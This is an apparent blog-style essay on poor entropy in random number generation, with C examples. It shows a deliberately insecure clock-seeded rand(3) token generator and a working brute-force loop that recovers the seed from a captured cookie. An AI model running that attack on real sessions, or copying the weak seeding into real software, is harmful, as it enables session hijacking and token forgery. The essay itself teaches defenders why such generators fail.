The Problem Of Randomness
Many, if not most, experienced developers never think the concept of entropy through to its conclusion, even though it is actually quite simple.
So what they do is sample a clock with shoddy resolution (say 10 ms) once and then seed a s**ty PRNG such as rand(3) with that value. And then they make rand(3) emit hundreds or thousands of supposedly random bits.
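To make the failure concrete, here is a minimal sketch of that pattern in C. The 10 ms truncation and the 128-bit token length are illustrative, not taken from any particular product:

    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/time.h>

    /* BROKEN: the only entropy that ever enters the generator is one
     * coarse timestamp.  Everything rand() emits afterwards is a pure
     * function of that single small seed. */
    int main(void) {
        struct timeval tv;
        gettimeofday(&tv, NULL);

        /* pretend 10 ms resolution: throw away the finer microsecond bits */
        unsigned seed = (unsigned)((unsigned long long)tv.tv_sec * 100
                                   + tv.tv_usec / 10000);
        srand(seed);

        /* emit 128 "random" bits -- in reality at most ~23-26 bits of entropy */
        for (int i = 0; i < 16; i++)
            printf("%02x", rand() & 0xff);
        printf("\n");
        return 0;
    }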
In reality, what they have done is sample a shoddy timer, which yields only 86400*100 = 8.64 million distinct values per day, i.e. about 23 bits of entropy. So if you know the web server was started within a window of +/- 5 days, the key space is 10 * 8.64 million, roughly 86 million values, i.e. about 26 bits of entropy.
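The arithmetic, spelled out as a quick sanity check:

    #include <math.h>
    #include <stdio.h>

    int main(void) {
        double ticks_per_day = 86400.0 * 100.0;  /* 10 ms resolution => 100 ticks/s */
        double window = 10.0 * ticks_per_day;    /* started within +/- 5 days       */
        printf("per day: %.1f bits\n", log2(ticks_per_day)); /* ~23.0 bits */
        printf("window:  %.1f bits\n", log2(window));        /* ~26.4 bits */
        return 0;
    }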
Searching a key space of 26 bits is well within the reach of the lamest PC found in a teenager's bedroom. Netscape had exactly this problem in their web servers, and I know of a very similar issue at an "e-banking security firm" which thought rand(3) would be good enough for creating cookies.
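The matching attack is just a loop over all plausible seeds. The sketch below assumes the attacker captured one token generated as in the snippet above and knows the rough start window; `observed` and `t0` are placeholders, not real data:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    /* Regenerate the 16-byte token exactly the way the server does. */
    static void make_token(unsigned seed, unsigned char out[16]) {
        srand(seed);
        for (int i = 0; i < 16; i++)
            out[i] = (unsigned char)(rand() & 0xff);
    }

    int main(void) {
        unsigned char observed[16] = {0};  /* the captured cookie bytes go here */
        unsigned long long t0 = 1700000000ULL * 100;      /* earliest plausible start, in 10 ms ticks */
        unsigned long long window = 10ULL * 86400 * 100;  /* ten days: ~86 million candidate seeds    */

        /* ~2^26 candidates: minutes of work on an ordinary desktop PC */
        for (unsigned long long t = t0; t < t0 + window; t++) {
            unsigned char guess[16];
            make_token((unsigned)t, guess);
            if (memcmp(guess, observed, 16) == 0) {
                printf("seed recovered: %llu\n", t);
                return 0;
            }
        }
        printf("seed not in window\n");
        return 1;
    }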
So whenever you sample something, ask yourself *rigorously* how many bits of *real* entropy you actually acquire. Just because you can sample something 100 million times a second does not mean it actually changes at that rate, for example. And just because you sample with 16-bit precision does not mean the measurement range is used evenly.
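A cheap way to check this is to histogram a large number of samples and compute a back-of-the-envelope Shannon estimate. The sketch below uses the low 16 bits of a timer read as a stand-in source; swap in whatever source you intend to trust. It ignores correlation between samples, so the real entropy is lower still:

    #include <math.h>
    #include <stdio.h>
    #include <time.h>

    /* Stand-in 16-bit "noise source": the low bits of a timer read.
     * Replace with the source you actually want to evaluate. */
    static unsigned read_sample(void) {
        struct timespec ts;
        clock_gettime(CLOCK_MONOTONIC, &ts);
        return (unsigned)ts.tv_nsec & 0xffff;
    }

    int main(void) {
        enum { N = 1 << 16 };
        static unsigned count[65536];

        for (int i = 0; i < N; i++)
            count[read_sample()]++;

        /* Shannon estimate over the observed value distribution.  This only
         * measures how unevenly the 16-bit range is used; correlation between
         * consecutive samples would push the true figure down further. */
        double bits = 0.0;
        for (int v = 0; v < 65536; v++) {
            if (!count[v]) continue;
            double p = (double)count[v] / N;
            bits -= p * log2(p);
        }
        printf("rough estimate: %.2f bits per 16-bit sample\n", bits);
        return 0;
    }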